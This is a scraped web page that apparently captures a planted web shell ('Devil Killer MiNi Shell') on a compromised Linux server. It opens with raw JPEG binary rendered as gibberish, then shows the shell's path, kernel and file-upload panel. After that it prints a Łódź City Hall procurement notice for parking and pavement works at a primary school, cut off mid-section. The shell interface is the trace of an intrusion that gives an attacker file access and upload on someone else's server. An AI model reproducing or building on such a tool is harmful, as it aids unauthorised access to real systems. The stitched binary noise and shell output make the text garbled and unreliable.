JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211005/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211005/0021184801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja parkingu i chodnika przy Szkole Podstawowej nr 71 w Łodzi od strony ul. S. Brynickiej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi zamawiający centralny</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Urząd Miasta Łodzi</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 472057632</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Piotrkowska 104</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">90-926</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@uml.lodz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://uml.lodz.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - związek jednostek samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja parkingu i chodnika przy Szkole Podstawowej nr 71 w Łodzi od strony ul. S. Brynickiej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f51d4455-2506-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00211848</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000922/16/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.22 Przebudowa parkingu i chodnika przy Szkole Podstawowej nr 71</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.uml.lodz.pl/urzad-miasta/przetargi/ https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">[Numeracja zgodna z SWZ]: 15.1.1.<br/>W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami<br/>odbywa się przy użyciu miniPortalu https://miniPortal.uzp.gov.pl/, ePUAP (Elektroniczna Skrzynka Podawcza – nazwa – Urząd Miasta Łodzi) https://epuap.gov.pl/wps/portal oraz poczty elektronicznej email: zamowienia@uml.lodz.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">[Numeracja zgodna z SWZ]:15.1.3. Wykonawca zamierzający wziąć udział w postępowaniu o<br/>udzielenie zamówienia publicznego musi posiadać konto na ePUAP. Wykonawca posiadający konto na<br/>ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza<br/>do komunikacji.<br/>15.1.4. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>zostały opisane w Instrukcji użytkowania systemu miniPortal oraz Regulaminie ePUAP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">[Numeracja zgodna z SWZ]: 33.1. Zgodnie z art. 13 ust. 1 i 2<br/>ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 r. rozporządzenie<br/>Parlamentu Europejskiego i Rady UE 2016/679 w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE) uprzejmie informujemy, że:<br/>33.1.1. Administratorem danych osobowych jest Prezydent Miasta Łodzi z siedzibą w Łodzi przy ul.<br/>Piotrkowskiej 104, 90-926 Łódź, tel.: +48 (42) 638-44-44, fax: +48 (42) 272-60-01, e-mail:<br/>lckm@uml.lodz.pl. 33.1.2. Administrator wyznaczył inspektora oraz zastępcę inspektora ochrony<br/>danych osobowych, z którymi może się Pani/Pan skontaktować poprzez e-mail iod@uml.lodz.pl Z<br/>inspektorem ochrony danych i jego zastępcą można się kontaktować we wszystkich sprawach dotyczących przetwarzania danych osobowych przez Urząd Miasta Łodzi oraz korzystania z praw<br/>związanych z przetwarzaniem danych. 33.1.3. Podanie danych osobowych jest warunkiem koniecznym<br/>do realizacji sprawy w Urzędzie Miasta Łodzi. Ogólną podstawę do przetwarzania danych stanowi art. 6<br/>ust. 1 lit. b i c oraz art. 10 ogólnego rozporządzenia. Szczegółowe cele przetwarzania danych zostały<br/>wskazane w następujących przepisach: a) ustawie z dnia 11 września 2019 r. – Prawo zamówień<br/>publicznych; b) ustawie z dnia 23 kwietnia 1964 r. – Kodeks cywilny; c) ustawie z dnia 27 sierpnia 2009<br/>r. o finansach publicznych; d) ustawie z dnia 29 września 1994 r. o rachunkowości. Pani/Pana dane<br/>będą przetwarzane w celu: - przeprowadzenia postępowania o udzielenie zamówienia publicznego i<br/>wyłonienie wykonawcy; - zawarcia umowy; - rozliczenia finansowo- księgowego. 33.1.4. Dane<br/>osobowe mogą być udostępniane innym podmiotom, uprawnionym do ich otrzymania na podstawie<br/>obowiązujących przepisów prawa, tj. na podstawie art. 18 i art. 74<br/>Prawa zamówień publicznych a ponadto odbiorcom danych w rozumieniu przepisów o ochronie danych<br/>osobowych, tj. podmiotom świadczącym usługi pocztowe, kurierskie, usługi informatyczne, bankowe,<br/>ubezpieczeniowe, osobom i podmiotom zainteresowanym prowadzonym postępowaniem o udzielenie<br/>zamówienia publicznego, a także podmiotom korzystającym z Biuletynu Informacji Publicznej,<br/>Biuletynu Zamówień Publicznych, Bazy konkurencyjności oraz internetowej platformy zakupowej –<br/>eKatalogi, będącej w gestii Urzędu Zamówień Publicznych. Dane osobowe nie będą przekazywane do<br/>państw trzecich, na podstawie szczególnych regulacji prawnych, w tym umów międzynarodowych. [ze<br/>względu na ograniczoną liczbę znaków pozostała część zapisów została przeniesiona do pkt RODO<br/>(ograniczenia stosowania)]</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">33.1.5. Dane osobowe będą przetwarzane, w tym<br/>przechowywane przez okres 4 lat, licząc od pierwszego stycznia roku następującego po roku, w którym<br/>sprawa została zakończona, a następnie, zgodnie z przepisami ustawy z dnia 14 lipca 1983 r. o<br/>narodowym zasobie archiwalnym i archiwach, przez okres 5 lat, zgodnie kategorią B5, w przypadku<br/>dokumentacji postępowania oraz 10 lat w związku z zawartą umową, zgodnie z kategorią archiwalną<br/>B10, a w przypadku zmiany kategorii archiwalnej dokumentacji przez okres zgodny ze zmienioną<br/>kategorią archiwalną dokumentacji. W przypadku zamówień finansowanych ze środków funduszy<br/>europejskich lub innych środków niż pochodzące z budżetu Unii Europejskiej na podstawie odrębnych<br/>przepisów w tym zakresie do 25 lat. 33.1.6. W związku z przetwarzaniem danych osobowych, na<br/>podstawie przepisów prawa, posiada Pani/Pan prawo do: 33.1.6.1. dostępu do treści swoich danych,<br/>na podstawie art. 15 ogólnego rozporządzenia;<br/>33.1.6.2. sprostowania danych, na podstawie art. 16 ogólnego rozporządzenia; 33.1.6.3. ograniczenia<br/>przetwarzania, na podstawie art. 18 ogólnego rozporządzenia. 33.1.7. Ma Pani/Pan prawo wniesienia<br/>skargi do organu nadzorczego – Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, iż<br/>przetwarzanie danych osobowych narusza przepisy o ochronie danych osobowych.<br/>33.1.8. Gdy podanie danych osobowych wynika z przepisów prawa, jest Pani/Pan zobowiązana(y) do<br/>ich podania. Konsekwencją niepodania danych osobowych będzie brak możliwości zawarcia umowy o<br/>udzielenie zamówienia publicznego. 33.1.9. Dane nie będą przetwarzane w sposób zautomatyzowany,<br/>w tym również w formie profilowania. 33.1.10. Wykonawca, wypełniając obowiązki informacyjne<br/>wynikający z art. 13 lub art. 14 RODO względem osób fizycznych, od których dane osobowe<br/>bezpośrednio lub pośrednio pozyskał w celu ubiegania się o udzielenie zamówienia publicznego w tym<br/>postępowaniu składa stosowne oświadczenie zawarte w Formularzu ofertowym (Załącznik nr 2 do<br/>SWZ).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DSR-ZP-III.271.104.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem niniejszego postępowania jest wykonanie robót budowlanych dla zadania pn.<br/>"Modernizacja parkingu i chodnika przy Szkole Podstawowej nr 71 w Łodzi od strony ul. S.<br/>Brynickiej" na terenie nieruchomości oznaczonych jako dz. nr 31/102, 31/96, 31/43, obręb B-41.<br/>Zadanie obejmuje wykonanie remontu:<br/>- parkingu,<br/>- zjazdu,<br/>- chodnika. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45223300-9 - Roboty budowlane w zakresie parkingów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">[Numeracja zgodna z SWZ]: 22.1. Zamawiający wyznaczył następujące<br/>kryteria oceny ofert przypisując im odpowiednie wagi punktowe i przyjął, że w zakresie każdego<br/>kryterium wyboru oferty najkorzystniejszej 1% wagi kryterium = 1 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji i rękojmi na wykonane roboty budowlane (G)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> [Numeracja zgodna z SWZ]: O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy<br/>spełniają następujące warunki udziału w postępowaniu dotyczące:<br/>8.1.4. zdolności technicznej lub zawodowej:<br/>8.1.4.1. Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże, że należycie wykonał<br/>nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną robotę budowlaną<br/>polegającą na budowie/przebudowie parkingu, na kwotę minimum 200.000,00 PLN (brutto).<br/>Uwaga:<br/>1) Przez parking należy rozumieć wyznaczone miejsce służące do odstawiania /parkowania<br/>pojazdów mechanicznych lub innych środków komunikacji. Miejsca postojowe na parkingu są<br/>dostosowane do rozmiaru i charakteru pojazdów, z uwzględnieniem sposobu parkowania oraz w<br/>odpowiedni sposób oznakowane.<br/>2) Ww. roboty nie muszą być wykonane w ramach jednego kontraktu/umowy.<br/>3) W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia lub polegania<br/>na zdolnościach podmiotów udostępniających zasoby ww. warunek oceniany będzie łącznie.<br/>4) W przypadku, gdy Wykonawca wykonywał w ramach kontraktu/umowy większy zakres prac,<br/>dla potrzeb niniejszego zamówienia powinien wyodrębnić i podać zakres / wartość zamówień, o<br/>których mowa powyżej.<br/>5) Jeżeli Wykonawca wykazuje doświadczenie nabyte w ramach kontraktu (zamówienia/umowy)<br/>realizowanego przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(konsorcjum), Zamawiający nie dopuszcza, by Wykonawca polegał na doświadczeniu grupy<br/>Wykonawców, której był członkiem, jeżeli faktycznie i konkretnie nie wykonywał wykazywanego<br/>zakresu prac. Zamawiający zastrzega możliwość zwrócenia się do Wykonawcy o wyjaśnienia w<br/>zakresie faktycznie konkretnie wykonywanego zakresu prac oraz przedstawienia stosownych<br/>dowodów np. umowy konsorcjum, z której wynika zakres obowiązków czy wystawionych przez<br/>Wykonawcę faktur.<br/>6) Dla potrzeb oceny spełniania warunku określonego powyżej, jeśli wartość lub wartości<br/>zostaną podane w walutach innych niż PLN, Zamawiający przyjmie średni kurs danej waluty<br/>publikowany przez Narodowy Bank Polski w dniu publikacji ogłoszenia o zamówieniu w<br/>Biuletynie Zamówień Publicznych. Jeżeli w dniu publikacji ogłoszenia o zamówieniu w Biuletynie<br/>Zamówień Publicznych, Narodowy Bank Polski nie publikuje średniego kursu danej waluty, za<br/>podstawę przeliczenia przyjmuje się średni kurs waluty publikowany pierwszego dnia, po dniu<br/>publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.<br/>7) Zamawiający zastrzega weryfikację potwierdzenia należytego wykonania prac bezpośrednio u<br/>podmiotu, na rzecz którego były wykonane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">[Numeracja zgodna z SWZ]: 9.2.1. Oświadczenie Wykonawcy o aktualności informacji zawartych<br/>w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp w zakresie odnoszącym się do podstaw<br/>wykluczenia wskazanych przez Zamawiającego, o których mowa w:<br/>9.2.1.1. art. 108 ust. 1 pkt 3 ustawy Pzp, 9.2.1.2. art. 108 ust.1 pkt 4 ustawy Pzp, dotyczących<br/>orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>9.2.1.3. art. 108 ust. 1 pkt 5 ustawy Pzp dotyczących zawarcia z innymi Wykonawcami porozumienia<br/>mającego na celu zakłócenie konkurencji, 9.2.1.4. art. 108 ust. 1 pkt 6 ustawy Pzp.<br/>9.2.1.5. Wzór oświadczenia stanowi Załącznik nr 5a do SWZ. W przypadku Wykonawców wspólnie<br/>ubiegających się o zamówienie oświadczenie Wykonawcy o aktualności informacji zawartych w<br/>oświadczeniu o którym mowa w art. 125 ust. 1 ustawy Pzp składa każdy z tych Wykonawców (dotyczy<br/>również wspólników spółki cywilnej).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">[Numeracja zgodna z SWZ]: 9.2.2 Wykaz robót budowlanych (wg wzoru -<br/>Załącznik nr 7 do SWZ) wykonanych nie wcześniej niż w okresie ostatnich pięciu lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz, których roboty te<br/>zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane<br/>należycie,<br/>przy czym dowodami, o których mowa,<br/>- referencje;<br/>- bądź inne dokumenty sporządzone przez podmiot, na rzecz, którego roboty budowlane zostały<br/>wykonane;<br/>- a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów –<br/>inne odpowiednie dokumenty.<br/>Uwaga:<br/>1. Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych<br/>wspólnie z innymi Wykonawcami, wykaz<br/>o którym mowa w pkt. 9.2.2., dotyczy robót budowlanych, w których wykonaniu Wykonawca ten<br/>bezpośrednio uczestniczył.<br/>2. Okres wyrażony w latach, o którym mowa w pkt. 9.2.2 SWZ liczy się wstecz od dnia, w którym<br/>upływa termin składania ofert.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przez Wykonawcę przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> [Numeracja zgodna z SWZ]: 12.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie<br/>zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich<br/>w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>12.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z<br/>nich nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp, natomiast<br/>spełnianie warunków udziału w postępowaniu Wykonawcy wykazują zgodnie z pkt. 8.1 SWZ.<br/>12.3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w pkt. 9.1 SWZ, składa każdy z Wykonawców. Oświadczenia te<br/>potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału, w zakresie, w jakim<br/>każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. 12.4.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie,<br/>z którego wynika, które roboty lub usługi wykonają poszczególni Wykonawcy (zgodnie z<br/>Załącznikiem nr 6 do SWZ). 12.5. Oświadczenia i dokumenty potwierdzające brak podstaw do<br/>wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie. 12.6. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są<br/>oni zobowiązani, na wezwanie Zamawiającego złożyć aktualne na dzień złożenia podmiotowe<br/>środki dowodowe, o których mowa w pkt. 9.2, przy czym:<br/>12.6.1. podmiotowe środki dowodowe, o których mowa w pkt 9.2.1 składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienia, 12.6.2. podmiotowe środki dowodowe, o których mowa<br/>w pkt 9.2.2, składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/wykazują spełnianie warunku, w zakresie i na zasadach opisanych w pkt 8.1 SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje 